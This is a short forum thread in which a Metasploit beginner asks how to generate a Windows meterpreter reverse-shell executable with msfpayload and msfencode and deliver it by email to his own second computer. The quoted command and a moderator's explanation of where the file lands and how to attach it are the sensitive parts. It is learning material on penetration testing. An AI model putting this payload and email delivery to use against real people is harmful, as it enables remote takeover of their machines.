Thread: New to meterpreter

Just burned his ISO

Default New to meterpreter

I'm new with the whole msf thing but i have done a lot of reading concerning it. Still, there are some things that i have always are bugging me. When to use,

./msfpayload windows/meterpreter/reverse_tcp LHOST=A.B.C.D LPORT=8080 R | ./msfencode -b '' -t exe -o meterpreter.exe

and

set RHOST 10.1.1.2 ==> Target
    set RPORT

From what i read, the "msfpayload windows/...." is to create the payload and one of the next step consist of sending that payload to someone's email as an attachment... How is it done?
    What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?

I have two computers ( laptop and a desktop) i want to use metasploit on my laptop to create a payload then send it to an email address on me desktop then get into my desktop through, how do you start?
    What i am trying to figure out are; when to create the payload? When to send it? How to send it as an attachment? and when to use the RHOST?

Thanks for your time and consideration

Super Moderator Archangel-Amael's Avatar

Might want to look into the metasploit unleashed training here
    http://www.offensive-security.com/blog/
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

You do it like you would for any other type of email attachment you want to send...
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.

Just burned his ISO

Thanks archangel.amael but the site isn't working
    lol Lupin, i guess i didnt't formulate my question correctly. What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?

Super Moderator Archangel-Amael's Avatar

As the error message states on the blog page it is an error, try harder or go home.
    Just give it some time it will work again.
    To be successful here you should read all of the following.
    ForumRules
    ForumFAQ
    If you are new to Back|Track
    Back|Track Wiki
    Failure to do so will probably get your threads deleted or worse.

Quote Originally Posted by phen1x View Post
    Thanks archangel.amael but the site isn't working
    lol Lupin, i guess i didnt't formulate my question correctly. What i meant was, once i typed in the code, does it "created" itself? or do i have to "create" it then type in the code? and where can i find it (in what folder) once it's done so i can send it?
    The command you have given should create the executable in the present working directory (as meterpreter.exe) - once you include the correct options for LHOST that is. What you are doing with the command is creating a reverse meterpreter payload in raw format (R) with msfpayload and then piping that into msfencode which is encoding the output into a windows executable called meterpreter.exe, which will be placed into the current directory (which will probably be /pentest/exploits/framework3 if you are doing this on BackTrack). From there you can do whatever you would like to do with that executable file, like attach it to an email.

Be aware that I have seen people having trouble with creating executables in this manner using msfpayload. There's a thread on the forums here where I responded to spawn giving him an alternate method to do this. You may want to hunt that down if you have problems. Id also suggest that you look for other examples of those particular commands so you can get an idea of what they do. Have a look at Metasploit Unleashed as suggested by archangel.amael, as well as looking at some other Metasploit examples on the forums here.
    Capitalisation is important. It's the difference between "Helping your brother Jack off a horse" and "Helping your brother jack off a horse".

The Forum Rules, Forum FAQ and the BackTrack Wiki... learn them, love them, live them.